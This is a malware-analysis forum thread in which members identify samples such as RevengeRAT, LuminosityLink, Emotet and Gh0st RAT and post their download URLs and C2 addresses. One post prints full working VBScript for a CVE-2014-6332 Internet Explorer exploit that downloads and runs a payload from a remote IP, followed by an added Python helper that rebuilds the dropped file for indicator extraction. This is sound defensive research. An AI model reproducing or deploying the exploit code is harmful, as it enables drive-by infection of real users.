Malware collection

Forum for analysis and discussion about malware.
Cody Johnston
Posts: 157
Joined: Sun May 01, 2011 4:33 pm
Location: Los Angeles, CA

Re: Malware collection

Post by Cody Johnston » Sat Jul 22, 2017 7:46 am

That is called 'RevengeRAT'

Code:

this.ID = "SGFja2VkIEJ5IEhhbGxhag==";
ID string says 'Hacked By Hallaj'

It gets the payload from pastebin: hxxps://pastebin.com/raw/UCXsTaZ8 then loads it using csc

contacts: hxxp://89.148.30.116 on port 948 for C2

2nd stage 'unpacked' here: https://www.virustotal.com/en/file/2bf7 ... 500708743/

ikolor
Posts: 276
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sun Jul 23, 2017 2:32 pm

You do not have the required permissions to view the files attached to this post.

xors
Posts: 138
Joined: Mon May 23, 2016 2:01 am

Re: Malware collection

Post by xors » Sun Jul 23, 2017 10:17 pm


CVE-2017-0199. Downloads from:
hxxp://dev.null.vg/sCjByat5.hta
@xorsthings

Antelox
Posts: 153
Joined: Sun Mar 21, 2010 10:38 pm

Re: Malware collection

Post by Antelox » Mon Jul 24, 2017 7:26 am

xors wrote:

CVE-2017-0199. Downloads from:
hxxp://dev.null.vg/sCjByat5.hta
Yes, which in turn downloads LuminosityLink RAT from:

Code:

hxxp://subaat.com/files/714.exe
https://www.virustotal.com/en/file/3414 ... 2/analysis

BR,

Antelox

ikolor
Posts: 276
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Mon Jul 24, 2017 7:43 pm

You do not have the required permissions to view the files attached to this post.

Antelox
Posts: 153
Joined: Sun Mar 21, 2010 10:38 pm

Re: Malware collection

Post by Antelox » Tue Jul 25, 2017 7:51 am

The file is an HTML page exploiting CVE-2014-6332. It contains escaped JavaScript code with download & run capabilities. The unescaped JavaScript code is the following:

Code:

<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>

<SCRIPT LANGUAGE="VBScript">

function runmumaa() 
On Error Resume Next
Set objWsh = CreateObject("Wscript.Shell")

objWsh.run "cmd.exe /c echo >>C:\Windows\Temp\text.vbs Set xPost=createObject(""Microsoft.XMLHTTP"") & echo >>C:\Windows\Temp\text.vbs xPost.Open ""GET"",""http://107.182.21.243/tt.exe"",0 & echo >>C:\Windows\Temp\text.vbs xPost.Send() & echo >>C:\Windows\Temp\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>C:\Windows\Temp\text.vbs sGet.Mode=3 & echo >>C:\Windows\Temp\text.vbs sGet.Type=1 & echo >>C:\Windows\Temp\text.vbs sGet.Open() & echo >>C:\Windows\Temp\text.vbs sGet.Write xPost.ResponseBody & echo >>C:\Windows\Temp\text.vbs sGet.SaveToFile ""C:\Windows\Temp\putty.exe"",2",0
objWsh.run "cscript.exe C:\Windows\Temp\text.vbs",0,true
wscript.sleep 10000
objWsh.run "C:\Windows\Temp\putty.exe"
document.write(Err.Description)
end function

</script>

<SCRIPT LANGUAGE="VBScript">
 
dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent

  if(instr(info,"Win64")>0)   then
     exit   function
  end if

  if (instr(info,"MSIE")>0)   then 
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
  else
     exit   function  
             
  end if

  win9x=0

  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()                    
     else  
          setnotsafemode()
     end if
  end if
end function

function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
    '   document.write(i)     
       Create=True
       Exit For
    End If 
  Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)  
  
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314

     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310  
     mydata=aa(a1)
     redim  Preserve aa(a0)  
end function 


function setnotsafemode()
    On Error Resume Next
    i=mydata()  
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)  
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
              j=0          
              redim  Preserve aa(a2)             
     aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0)  

     j=0 
              j=readmemo(i+&h120+k)   
         
               Exit for
           end if

    next 
    ab(2)=1.69759663316747E-313
    runmumaa() 
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
  
    redim  Preserve aa(a0) 
    redim   ab(a0)     
  
    redim  Preserve aa(a2)
  
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
          
    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16             
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then    
                 If(IsObject(aa(a1)) = False ) Then             
                   type1=VarType(aa(a1))
                 end if               
              end if
           else
             redim  Preserve aa(a0)
             exit  function

           end if 
        else
           if(vartype(aa(a1-1))<>0)  Then    
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if               
            end if
        end if
    end if
              
    
    If(type1=&h2f66) Then         
          Over=True      
    End If  
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If  

    redim  Preserve aa(a0)          
        
end function

function ReadMemo(add) 
    On Error Resume Next
    redim  Preserve aa(a2)  
  
    ab(0)=0   
    aa(a1)=add+4     
    ab(0)=1.69759663316747E-313       
    ReadMemo=lenb(aa(a1))  
   
    ab(0)=0    
 
    redim  Preserve aa(a0)
end function

</script>

</body>
</html>

It tries to download a payload from:

Code:

hxxp://107.182.21.243/tt.exe
https://www.virustotal.com/en/file/af72 ... /analysis/
https://www.hybrid-analysis.com/sample/ ... mentId=100

The payload seems to belong to Gh0st RAT AKA Miancha malware family.

C2:

Code:

ianxt.f3322.net

BR,

Antelox
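The dropper above does not write text.vbs directly; it chains `echo >>C:\Windows\Temp\text.vbs ...` segments through `cmd.exe /c` so that the downloader script only exists on disk after the exploit fires. When triaging a sample like this, the useful step is to reconstruct that dropped file and pull the URLs and paths out of it without executing anything. The following Python is an added analysis helper, not code from the post or from the malware: it parses the `.run` string arguments of a VBScript fragment, undoes VBScript's doubled-quote escaping, rebuilds every file written by an echo chain, and lists the IOCs found. The embedded sample is the three `objWsh.run` lines copied from the unescaped script above; the regexes and function names are this example's own.

```python
import re
from collections import OrderedDict

# Constructed sample input: the objWsh.run lines from the unescaped VBScript
# posted above (CVE-2014-6332 dropper), copied verbatim so the parser runs offline.
SAMPLE_VBS = r'''objWsh.run "cmd.exe /c echo >>C:\Windows\Temp\text.vbs Set xPost=createObject(""Microsoft.XMLHTTP"") & echo >>C:\Windows\Temp\text.vbs xPost.Open ""GET"",""http://107.182.21.243/tt.exe"",0 & echo >>C:\Windows\Temp\text.vbs xPost.Send() & echo >>C:\Windows\Temp\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>C:\Windows\Temp\text.vbs sGet.Mode=3 & echo >>C:\Windows\Temp\text.vbs sGet.Type=1 & echo >>C:\Windows\Temp\text.vbs sGet.Open() & echo >>C:\Windows\Temp\text.vbs sGet.Write xPost.ResponseBody & echo >>C:\Windows\Temp\text.vbs sGet.SaveToFile ""C:\Windows\Temp\putty.exe"",2",0
objWsh.run "cscript.exe C:\Windows\Temp\text.vbs",0,true
wscript.sleep 10000
objWsh.run "C:\Windows\Temp\putty.exe"
'''

# First string argument of every <obj>.run call; VBScript doubles quotes inside literals.
RUN_RE = re.compile(r'\.run\s+"((?:[^"]|"")*)"', re.IGNORECASE)
# One "echo >>PATH CONTENT" segment of a cmd.exe command chain.
ECHO_RE = re.compile(r'^echo\s+>>\s*(\S+)\s+(.*)$')
URL_RE = re.compile(r'https?://[^\s"\'<>,]+')
WINPATH_RE = re.compile(r'[A-Za-z]:\\[^\s"\'<>,]+')


def extract_run_commands(vbs_text):
    """Return the command lines handed to WScript.Shell.run, with quote escaping undone."""
    return [m.group(1).replace('""', '"') for m in RUN_RE.finditer(vbs_text)]


def reconstruct_echo_files(cmdline):
    """Rebuild the files written by an 'echo >>file line & echo >>file line ...' chain."""
    files = OrderedDict()
    body = re.sub(r'^cmd(?:\.exe)?\s+/c\s+', '', cmdline, flags=re.IGNORECASE)
    for segment in body.split(' & '):
        m = ECHO_RE.match(segment.strip())
        if m:
            files.setdefault(m.group(1), []).append(m.group(2))
    return {path: '\n'.join(lines) for path, lines in files.items()}


def extract_iocs(text):
    """Unique URLs and Windows paths, in order of first appearance."""
    urls = list(OrderedDict.fromkeys(URL_RE.findall(text)))
    paths = list(OrderedDict.fromkeys(WINPATH_RE.findall(text)))
    return {'urls': urls, 'paths': paths}


def analyse(vbs_text):
    """Pipeline: run commands -> dropped files -> IOCs over commands and dropped content."""
    commands = extract_run_commands(vbs_text)
    dropped = {}
    for cmd in commands:
        dropped.update(reconstruct_echo_files(cmd))
    everything = '\n'.join(commands + list(dropped.values()))
    return {'commands': commands, 'dropped': dropped, 'iocs': extract_iocs(everything)}


if __name__ == '__main__':
    result = analyse(SAMPLE_VBS)
    for path, content in result['dropped'].items():
        print(f'--- reconstructed {path} ---')
        print(content)
    print('URLs :', result['iocs']['urls'])
    print('Paths:', result['iocs']['paths'])
```

Running it prints the nine-line downloader that text.vbs would contain (XMLHTTP GET, ADODB.Stream SaveToFile) plus the download URL and the two temp paths. The same reconstruction step is what a sandbox report shows as "dropped files"; doing it statically means the sample never has to run, and the echo-chain pattern itself (`cmd.exe /c echo >>` repeated into a `.vbs` path) is a reasonable thing to alert on in process-creation logs.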

ikolor
Posts: 276
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Wed Jul 26, 2017 8:29 am

You do not have the required permissions to view the files attached to this post.

Antelox
Posts: 153
Joined: Sun Mar 21, 2010 10:38 pm

Re: Malware collection

Post by Antelox » Wed Jul 26, 2017 9:27 am

Geodo/Emotet doc downloader

https://www.hybrid-analysis.com/sample/ ... mentId=100

The Geodo binary:

https://www.virustotal.com/en/file/a79d ... /analysis/
https://www.hybrid-analysis.com/sample/ ... mentId=100

FYI in the HA report, you can find some download URLs, both for the doc and the binary.

BR,

Antelox

ikolor
Posts: 276
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Wed Jul 26, 2017 7:04 pm

You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 276
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Thu Jul 27, 2017 6:50 am

Excuse me, what is this file? Malware or not? I see it is coded, this file "cve5p3sM.rar".

https://www.virustotal.com/en/file/8fd0 ... 501137934/
You do not have the required permissions to view the files attached to this post.
